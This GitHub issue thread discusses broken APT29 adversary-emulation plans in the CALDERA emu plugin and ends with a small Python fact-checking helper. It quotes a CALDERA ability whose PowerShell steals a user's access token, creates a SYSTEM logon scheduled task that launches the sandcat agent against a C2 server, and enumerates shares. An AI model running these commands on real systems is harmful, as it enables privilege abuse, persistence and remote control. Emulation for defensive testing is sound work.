APT29 Plugin execution errors #18
I am not able to execute the first step of the APT29 profile; I am getting the below:
Hello, I think I can shed some light on the issues you are encountering. To my knowledge, as of now, the apt29 execution from https://github.com/center-for-threat-informed-defense/adversary_emulation_library is broken for multiple reasons 💔 . I won't list all of them here as it might make this message lengthy and hard to read 🧾 . The issue you are referencing is linked to this issue. The gist of it is that in mitre-attack/attack-arsenal from caldera v2.6.6 (the previous caldera) there were 3 plans for apt29 scenarios:
All other plans were APT3 related:
Those plans all got merged together in caldera 3.0 into a single emulation plan yaml file. The confusion seems to stem from the fact that they used to all be in the same folder named This change happened when it got migrated from mitre-attack/attack-arsenal to center-for-threat-informed-defense/adversary_emulation_library. The old plans are also visible in the archive folder. The ability you are referencing is not an apt29 original ability but an apt3 one:

```yaml
- id: 03afada1-1714-408f-bde5-f528b91dc89d
  name: >-
    5.B.1 - Access Token Manipulation (T1134),
    6.A.1 - Query Registry (T1012),
    7.B.1 - Remote File Copy (T1105),
    7.C.1 - Scheduled Tasks (T1053),
    8.A.1/2 - File and Directory Discovery (T1083)
  description: A token theft script was executed to steal and assume the token of another user's existing process, changing the user context of the process.
  tactic: defensive-evasion
  technique:
    attack_id: T1134
    name: Access Token Manipulation (T1134)
  platforms:
    windows:
      psh,pwsh:
        command: |
          Import-Module .\StealToken.ps1 -Verbose -Force;
          StealToken;
          CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"';
          CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM';
          CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}';
          CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%';
          RevertToSelf;
        payload: StealToken.ps1,sandcat.go-windows
```

There is no easy solution. One of them is to execute apt29 from caldera 2.6.6. Another solution is to split the apt29.yml file back into multiple sub plans like in the original caldera DIY. If you go this path you will encounter other problems that arose because the plans were written with caldera 2 in mind and some abilities broke with caldera 3. Another problem is payload related but I won't dwell on it as it is another problem. I have forked center-for-threat-informed-defense/adversary_emulation_library and made some changes and now have a close to operational apt29 execution, but I'm waiting for maintainers to comment on the relevant issue before proposing a merge request as it involves multiple file changes.
The emu plugin is just converting what exists in the center-for-threat-informed-defense/adversary_emulation_library. This issue would require a change there. I would recommend trying @Thamane's suggestions if you haven't already. If nothing else works, feel free to re-open this issue or start a new one. Thanks!
The Day 1 part completes but then the Day 2 part never starts and it just stays hung up at that point. Basically, after the restart in Day 1, new bots are not created again, which leads to the apt29 plugin getting stuck at the Artifact cleanup phase after the scheduled task phase. Also, is there any documentation on what each of the facts means, so that I can verify that I have the correct things where they should be?
Also, when using the StealToken powershell script in the Access Token Manipulation stage I get these errors:
I think most of the errors that I am getting can just be due to a misunderstanding of which facts should go where. Can you please help me understand this part?
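One way to answer the "which facts does each ability need" question before running the plan is to scan the emulation plan yaml for `#{fact}` placeholders and payload names per ability, and compare them with the facts you have actually supplied. This is an added example, not code from the caldera project or the emu plugin; it assumes the ability layout quoted above (one `- id:` entry per ability, facts written as `#{name}`, a comma-separated `payload:` line), and the sample plan, the second ability id and the fact `host.dir.staging` are constructed for illustration.

```python
import re

# Constructed sample plan in the layout of the ability quoted in this thread.
# The first entry reuses lines from the quoted ability; the second entry is made up.
SAMPLE_PLAN = """\
- id: 03afada1-1714-408f-bde5-f528b91dc89d
  name: 5.B.1 - Access Token Manipulation (T1134)
  platforms:
    windows:
      psh,pwsh:
        command: |
          CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}';
          CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /tr ".\\sandcat.exe #{server} evals"';
        payload: StealToken.ps1,sandcat.go-windows
- id: 00000000-0000-0000-0000-000000000001
  name: 7.B.1 - Remote File Copy (T1105)
  platforms:
    windows:
      psh,pwsh:
        command: |
          Copy-Item #{remote.file.share}\\tool.exe #{host.dir.staging}
        payload: tool.exe
"""

ABILITY_RE = re.compile(r"^- id:\s*(\S+)", re.MULTILINE)   # start of each ability entry
FACT_RE = re.compile(r"#\{([A-Za-z0-9_.]+)\}")              # #{fact.name} placeholders
PAYLOAD_RE = re.compile(r"^\s*payload:\s*(.+)$", re.MULTILINE)

def abilities(plan_text):
    """Yield (ability_id, raw_text) for each '- id:' entry, split on the next '- id:'."""
    matches = list(ABILITY_RE.finditer(plan_text))
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(plan_text)
        yield m.group(1), plan_text[m.start():end]

def fact_references(plan_text):
    """Map each ability id to the sorted, de-duplicated fact names its commands use."""
    return {aid: sorted(set(FACT_RE.findall(block))) for aid, block in abilities(plan_text)}

def payloads(plan_text):
    """Map each ability id to the payload files the ability expects to be served."""
    out = {}
    for aid, block in abilities(plan_text):
        m = PAYLOAD_RE.search(block)
        out[aid] = [p.strip() for p in m.group(1).split(",")] if m else []
    return out

def unresolved_facts(plan_text, known_facts):
    """Fact names the plan references that the operator has not supplied."""
    needed = {f for facts in fact_references(plan_text).values() for f in facts}
    return sorted(needed - set(known_facts))
```

Running `unresolved_facts` against the real apt29.yml with the fact names from your operation's source tells you which placeholders would stay unfilled, which is a common reason an ability errors out or a phase never starts.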